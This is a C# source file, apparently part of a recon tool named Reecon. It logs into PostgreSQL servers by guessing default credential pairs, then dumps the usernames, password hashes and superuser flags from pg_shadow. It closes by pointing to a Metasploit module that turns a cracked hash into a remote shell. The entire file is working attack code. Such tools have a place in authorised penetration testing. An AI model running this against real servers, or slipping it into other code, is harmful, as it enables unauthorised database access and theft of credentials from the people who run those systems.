using Npgsql; // For PostgreSQL Stuff
using System;
using System.Collections.Generic;
using System.Data;
namespace Reecon
{
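class PostgreSQL
{
    // SQLSTATE reported for a rejected password; the probe treats it as "try the next pair".
    private const string InvalidPasswordSqlState = "28P01";

    /// <summary>
    /// Tries a short list of well-known default PostgreSQL username/password pairs against
    /// <paramref name="target"/>:<paramref name="port"/> (database <c>template1</c>) and, on the
    /// first pair that logs in, collects the server version and the rows of <c>pg_shadow</c>.
    /// </summary>
    /// <param name="target">Host name or address of the PostgreSQL server.</param>
    /// <param name="port">TCP port the server listens on.</param>
    /// <returns>
    /// A tuple of the service label <c>"PostgreSQL"</c> and a multi-line report. The report
    /// contains the working login pair in clear text and the <c>passwd</c> column of
    /// <c>pg_shadow</c>, so it holds credential material wherever it is printed or stored.
    /// </returns>
    public static (string, string) GetInfo(string target, int port)
    {
        string toReturn = "";
        // Thanks Metasploit!
        List<string> userList = new() { "postgres", "scott", "admin" };
        List<string> passList = new() { "tiger", "postgres", "password", "admin" };
        bool toBreak = false;
        foreach (string username in userList)
        {
            if (toBreak)
            {
                break;
            }
            foreach (string password in passList)
            {
                if (toBreak)
                {
                    break;
                }
                try
                {
                    // Build the connection string from typed properties instead of string
                    // interpolation, so a ';' or '=' inside target cannot add or override
                    // connection-string keywords. Built inside the try so a rejected value
                    // is reported in the result instead of escaping as an exception.
                    NpgsqlConnectionStringBuilder connInfo = new()
                    {
                        Host = target,
                        Port = port,
                        Username = username,
                        Password = password,
                        Database = "template1"
                    };
                    using NpgsqlConnection conn = new(connInfo.ConnectionString);
                    // Try connect
                    conn.Open();
                    // Connected - this pair is valid, so stop trying further pairs
                    toReturn += "- Login creds found: " + username + ":" + password + Environment.NewLine;
                    toBreak = true;
                    toReturn += GetVersionInfo(conn);
                    toReturn += GetShadowInfo(conn);
                }
                catch (Exception ex)
                {
                    if (IsInvalidPassword(ex))
                    {
                        // Invalid Password - move on to the next pair
                    }
                    else if (ex.Message == "Dependency unixODBC with minimum version 2.3.1 is required")
                    {
                        toReturn += "- Dependency missing. Download from: https://docs.microsoft.com/en-us/sql/connect/odbc/linux-mac/installing-the-microsoft-odbc-driver-for-sql-server?view=sql-server-ver15#ubuntu17";
                        toBreak = true;
                    }
                    else
                    {
                        // Anything else (unreachable host, bad port, TLS failure, ...) will not
                        // be fixed by another password, so report it once and stop.
                        toReturn += "- Fatal Error in PostgreSQL.GetInfo - Bug Reelix: " + ex.Message;
                        if (ex.InnerException != null)
                        {
                            Console.WriteLine("Inner exception is not null: " + ex.InnerException.Message);
                        }
                        toBreak = true;
                    }
                }
            }
        }
        if (toReturn == "")
        {
            toReturn = "- Unable to find credentials";
        }
        toReturn = toReturn.Trim(Environment.NewLine.ToCharArray());
        return ("PostgreSQL", toReturn);
    }

    // True when the failure is the server rejecting the password (SQLSTATE 28P01).
    private static bool IsInvalidPassword(Exception ex)
    {
        // Prefer the structured SQLSTATE; the message-prefix test is kept as a fallback
        // and made ordinal so the current culture cannot change the outcome.
        if (ex is PostgresException { SqlState: InvalidPasswordSqlState })
        {
            return true;
        }
        return ex.Message.Trim().StartsWith(InvalidPasswordSqlState, StringComparison.Ordinal);
    }

    // Runs SELECT version() on an open connection and returns the report lines for it.
    private static string GetVersionInfo(NpgsqlConnection conn)
    {
        string info = "";
        try
        {
            // Command, adapter and data set are all IDisposable; release them when done.
            using NpgsqlCommand cmd = new("SELECT version()", conn);
            using DataSet ds = new();
            using NpgsqlDataAdapter da = new()
            {
                SelectCommand = cmd
            };
            da.Fill(ds);
            foreach (DataRow r in ds.Tables[0].Rows)
            {
                info += "- Version: " + r["version"].ToString() + Environment.NewLine;
            }
        }
        catch (Exception ex)
        {
            info += "- Unable to pull Version info - Bug Reelix: " + ex.Message + Environment.NewLine;
        }
        return info;
    }

    // Reads usename, passwd and usesuper from pg_shadow and returns the report lines for them.
    // The passwd values are emitted as stored by the server; rows read before a failure are kept.
    private static string GetShadowInfo(NpgsqlConnection conn)
    {
        string info = "";
        try
        {
            using NpgsqlCommand cmd = new("SELECT usename, passwd, usesuper FROM pg_shadow", conn);
            using DataSet ds = new();
            using NpgsqlDataAdapter da = new()
            {
                SelectCommand = cmd
            };
            da.Fill(ds);
            foreach (DataRow r in ds.Tables[0].Rows)
            {
                string dbUser = r["usename"].ToString();
                string dbPass = r["passwd"].ToString();
                bool superUser = bool.Parse(r["usesuper"].ToString());
                info += "- pg_shadow User: " + dbUser + " - " + dbPass + " - Super User: " + superUser + Environment.NewLine;
            }
            info += "-- If a pg_shadow user password is cracked, you can get a shell with: use exploit/multi/postgres/postgres_copy_from_program_cmd_exec";
        }
        catch (Exception ex)
        {
            // Reached when the query throws, e.g. if the logged-in role may not read pg_shadow.
            info += "- Unable to pull pg_shadow info - Bug Reelix: " + ex.Message + Environment.NewLine;
        }
        return info;
    }
}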
}